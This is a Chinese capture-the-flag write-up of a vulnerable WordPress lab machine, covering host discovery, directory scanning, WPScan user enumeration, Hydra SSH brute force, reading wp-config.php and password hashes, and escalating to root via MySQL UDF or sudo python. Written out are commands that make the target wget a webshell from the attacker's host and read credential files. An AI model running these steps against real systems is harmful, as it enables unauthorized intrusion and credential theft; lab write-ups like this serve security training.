测试机:192.168.223.34
target:192.168.223.131
目标:拿flag和拿管理员权限
一
探测存活主机:arp-scan -l
二
端口探测(nmap为例)
然后我们发现有开启了ssh服务
还有http服务
三
扫描敏感目录
dirb http://192.168.223.131
四
其中通过访问vendor目录发现PHPMailerAutoload.php文件,查询发现是CVE-2016-10033是PHPMailer中存在的高危安全漏洞,攻击者只需要巧妙的构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害(见方法三)
五
我们再来查看首页
发现有几个分页面
六
通过全部访问查看后,终有在service.html查看源码中发现flag
flag1{b9bbcb33e11b80be759c4e844862482d}
拿到第 1 个flag
七
之前我们在第四步的时候发现wordpress目录,
所以我们使用wpscan工具来扫描
wpscan 是一个扫描WordPress漏洞的黑盒子扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等
wpscan --url http://192.168.223.131/wordpress -e u vp
-e 枚举方式
u id为1-10用户名
vp 扫描脆弱插件
发现2个用户
八
使用hydra工具对其进行ssh爆破
hydra -l michael -P /root/123.txt ssh://192.168.223.131
-l 指定用户名
-P 指定密码字典
破解出密码:“michael”(em…我其实没破解出来)
九
我们登陆这个账号试试
⑩
之前我们爆破wordpress的时候,发现有2个用户,那么现在我们来看下这2个用户的权限
cat /etc/passwd
发现是2个低权限玩家,噗
11
查询到 /var/www 目录下 存放这flag2.txt
拿到第2个flag
12 提权(方法一)
由于我们现在是低权限玩家,没啥作用
所以,我们现在来提权,变成高端玩家,才能搞事情(滑稽)
看一下进程
netstat -a
发现是本地数据库
下载一个工具,来收集mysql信息
wget https://www.securitysift.com/download/linuxprivchecker.py
然后执行,看可以收集到那些信息
python linuxprivchecker.py
通过这个工具收集到的信息,
我们可以知道mysql有user defined function(用户自定义函数)也就是UDF
通过她,我们可以知道mysql是root权限,因为必须是root权限(主要是得创建和抛弃自定义函数)
才能创建UDF(自定义mysql函数)
如果不知道啥意思,可以翻译一下,
上面说到可以用UDF提权,
UDF提权可以参考: https://www.exploit-db.com/exploits/1518/
这个网址就是之前工具收集到的
提权(方法二)
在wordpress目录下,上马
切换到wordpress目录下,测试机开启http服务
然后靶机去下载测试机上的大马
wget http://192.168.223.34/cao.php
查看wp-config.php的内容即可找到mysql的用户名和密码
cat wp-config.php
查看数据库,
发现默认数据库,
选择默认数据库,
查看表
查看wp-posts表
select * from wp-posts;
成功拿到flag3和flag4
感觉有点不对,不是应该拿到root权限后才会找到flag4嘛。
13
同时我们查询所有表后,在wp-users表中发现steven的hash值
破解出来为pink84。
13 登录另一个账号:steven
感觉有点不对,不是应该拿到root权限后才会找到flag4嘛。
flag4毕竟是偷的鸡,所以就当没有获得flag4,
因此提权,一种方法我在方法一已经大致描述过了。
现在我们来登录:steven
查看一下
查看当前用户的权限
sudo -l
可以发现python直接绕过root
利用sudo和python直接绕过root。
成功提权
最后flag4也拿到了
参考链接:https://www.anquanke.com/post/id/163996
https://www.cnblogs.com/bmjoker/p/10034001.html